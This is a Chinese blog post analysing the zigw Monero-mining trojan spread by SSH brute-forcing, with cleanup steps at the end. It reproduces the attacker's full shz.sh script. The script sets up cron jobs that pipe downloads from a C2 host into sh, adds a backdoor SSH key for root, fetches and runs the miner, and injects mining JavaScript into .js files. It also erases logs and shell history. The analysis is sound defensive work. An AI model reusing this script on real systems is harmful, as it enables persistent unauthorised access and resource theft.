zigw病毒清除

zigw是一种XMR挖矿工具,攻击者通过爆破SSH获取系统权限,配置root用户免密登录,并下载及执行XMR 挖矿程序,及XMR 网页挖矿程序。XMR挖矿程序耗主机的CPU/GPU资源,网页挖矿程序耗访问服务器JS 网页的客户端资源 。

攻击者的C2服务器页面本身就自带挖矿效果:

zigw的执行脚本 shz.sh如下,

#!/bin/shsetenforce 02>dev/nullechoSELINUX=desabled>/etc/sysconfig/selinux2>/dev/nullsync&&echo3>/proc/sys/vm/drop_cachescrondir='/var/spool/cron/'"$USER"cont=`cat$`ssht=`cat /root/.ssh/authorized_keys`echo1>/etc/gmbpr2rtdir="/etc/gmbpr2"oddir="/etc/gmbpr"bbdir="/usr/bin/curl"bbdira="/usr/bin/url"ccdir="/usr/bin/wget"ccdira="/usr/bin/get"mv /usr/bin/wget /usr/bin/getmv /usr/bin/curl /usr/bin/urlif[-f"$oddir"]thenpkill zjgwchattr -i /etc/shz.shrm -f /etc/shz.shchattr -i /tmp/shz.shrm -f /tmp/shz.shchattr -i /etc/gmbprrm -f /etc/gmbprelseecho"ok"fiif[-f"$rtdir"]thenecho"goto 1">>/etc/gmbpr2chattr -i$contif[-f"$bbdir"]then[[$cont=~"shz.sh"]]||echo"*/12 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh">>$else[[$cont=~"shz.sh"]]||echo"*/15 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh">>$fimkdir /root/.ssh[[$ssht=~"xvsRtqHLMWoh"]]||chmod 700 /root/.ssh/[[$ssht=~"xvsRtqHLMWoh"]]||echo>>/root/.ssh/authorized_keys[[$ssht=~"xvsRtqHLMWoh"]]||chmod 600 /root/.ssh/authorized_keys[[$ssht=~"xvsRtqHLMWoh"]]||echo"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFNFCF6tOvSqqN9Zxc/ZkBe2ijEAMhqLEzPe4vprfiPAyGO8CF8tn9dcPQXh9iv5/vYEbaDxEvixkTVSJpWnY/5ckeyYsXU9zEeVbbWkdRcuAs8bdVU7PxVq11HLMxiqSR3MKIj7yEYjclLHRUzgX0mF2/xpZEn4GGL+Kn+7GgxvsRtqHLMWoh2Xoz7f8Rb3KduYiJlZeX02a4qFXHMSkSkMnHirHHtavIFjAB0y952+1DzD36a8IJJcjAGutYjnrZdKP8t3hiEw0UBADhiu3+KU641Kw9BfR9Kg7vZgrVRf7lVzOn6O8YbqgunZImJt+uLljgpP0ZHd1wGz+QSHEd Administrator@Guess_me">>/root/.ssh/authorized_keysps -fe|grep zigw|grep -v grepif[$?-ne0 ]thencd/etcfilesize=`ls -l zigw|awk'{ print $5 }'`file="/etc/zigw"if[-f"$file"]thenif["$filesize"-ne"1467080"]thenchattr -i /etc/zigwrm -f zigwif[-f"$bbdir"]thencurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/etc/zigwelif[-f"$bbdira"]thenurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/etc/zigwelif[-f"$ccdir"]thenwget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigwelif[-f"$ccdira"]thenget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigwfifielseif[-f"$bbdir"]thencurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/etc/zigwelif[-f"$bbdira"]thenurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/etc/zigwelif[-f"$ccdir"]thenwget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigwelif[-f"$ccdira"]thenget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/zigwfifichmod 777 zigwsleep 1s./zigwelseecho"runing....."fichmod 777 /etc/zigwchattr +i /etc/zigwchmod 777 /etc/shz.shchattr +i /etc/shz.shshdir='/etc/shz.sh'if[-f"$shdir"]thenecho"exists shell"elseif[-f"$bbdir"]thencurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh>/etc/shz.shelif[-f"$bbdira"]thenurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh>/etc/shz.shelif[-f"$ccdir"]thenwget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.shelif[-f"$ccdira"]thenget --timeout=10 --tries=10 -P /etc http://c.21-2n.com:43768/shz.shfish /etc/shz.shfielseecho"goto 1">/tmp/gmbpr2chattr -i$contif[-f"$bbdir"]then[[$cont=~"shz.sh"]]||echo"*/10 * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh">>$else[[$cont=~"shz.sh"]]||echo"*/10 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh">>$fips -fe|grep zigw|grep -v grepif[$?-ne0 ]thencd/tmpfilesize=`ls -l zigw|awk'{ print $5 }'`file="/tmp/zigw"if[-f"$file"]thenif["$filesize"-ne"1467080"]thenchattr -i /tmp/zigwrm -f zigwif[-f"$bbdir"]thencurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/tmp/zigwelif[-f"$bbdira"]thenurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/tmp/zigwelif[-f"$ccdir"]thenwget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigwelif[-f"$ccdira"]thenget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigwfifielseif[-f"$bbdir"]thencurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/tmp/zigwelif[-f"$bbdira"]thenurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/zigw>/tmp/zigwelif[-f"$ccdir"]thenwget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigwelif[-f"$ccdira"]thenget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/zigwfifichmod 777 zigwsleep 1s./zigwelseecho"runing....."fichmod 777 /tmp/zigwchattr +i /tmp/zigwchmod 777 /tmp/shz.shchattr +i /tmp/shz.shshdir='/tmp/shz.sh'if[-f"$shdir"]thenecho"exists shell"elseif[-f"$bbdir"]thencurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh>/tmp/shz.shelif[-f"$bbdira"]thenurl --connect-timeout 10 --retry 10 http://c.21-2n.com:43768/shz.sh>/tmp/shz.shelif[-f"$ccdir"]thenwget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.shelif[-f"$ccdira"]thenget --timeout=10 --tries=10 -P /tmp http://c.21-2n.com:43768/shz.shfish /tmp/shz.shfifiiptables -Fiptables -Xiptables -A OUTPUT -p tcp --dport 3333 -j DROPiptables -A OUTPUT -p tcp --dport 5555 -j DROPiptables -A OUTPUT -p tcp --dport 7777 -j DROPiptables -A OUTPUT -p tcp --dport 9999 -j DROPiptables -A OUTPUT -p tcp --dport 14444 -j DROPiptables-saveservice iptables reloadps auxf|grep -v grep|grep"stratum"|awk''|xargskill-9netstat -ano|grep :3333|awk''|awk -F'[/]'''|xargskill-9netstat -ano|grep :4444|awk''|awk -F'[/]'''|xargskill-9netstat -ano|grep :5555|awk''|awk -F'[/]'''|xargskill-9netstat -ano|grep :6666|awk''|awk -F'[/]'''|xargskill-9netstat -ano|grep :7777|awk''|awk -F'[/]'''|xargskill-9netstat -ano|grep :3347|awk''|awk -F'[/]'''|xargskill-9netstat -ano|grep :14444|awk''|awk -F'[/]'''|xargskill-9netstat -ano|grep :14443|awk''|awk -F'[/]'''|xargskill-9find / -name'*.js'|xargs grep -L f4ce9|xargs sed -i'$a\document.write\('\'\\\OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\\'\)\;history-cecho>/var/spool/mail/rootecho>/var/log/wtmpecho>/var/log/secureecho>/root/.bash_historyecho>/var/spool/mail/root

可以看到,脚本首先生成特征文件,接着将系统自带的wget和curl重命名为get和url,防止以后其它进入本机挖矿的脚本下载矿机抢夺资源,然后如果存在特征文件,则认为该机器已经被其他同类攻击者感染,会停止zjgw进程并删除/etc下的gpbpr和shz.sh。

 

接下来判断如果存在自己的特征文件,就会为主机添加定时任务,并向authorized_keys中添加自己的公钥文件。

最后就会下载挖矿程序并执行,并为/tmp/zigw /tmp/shz/sh 增加i属性,避免被删除,最后添加防火墙规则屏蔽部分常用矿池的端口,并清除掉其他常见挖矿程序。

从脚本看出,zigw只是以定时任务的方式实现驻留,所以该木马的清除步骤为

1).清除定时任务,中的内容

2).结束zigw进程,

3).删除公钥文件,

4).删除残留文件,需要先去除i属性,然后删除()

5).恢复防火墙规则

参考链接

https://github.com/chenkaie/junkcode/blob/7134fb63eecf32fefc47d613a7f2f37d4eee05fb/xhide.c

https://github.com/gianlucaborello/libprocesshider

https://www.freebuf.com/column/188100.html

https://xmr.omine.org

https://www.f2pool.com/

你可能感兴趣的:(Linux)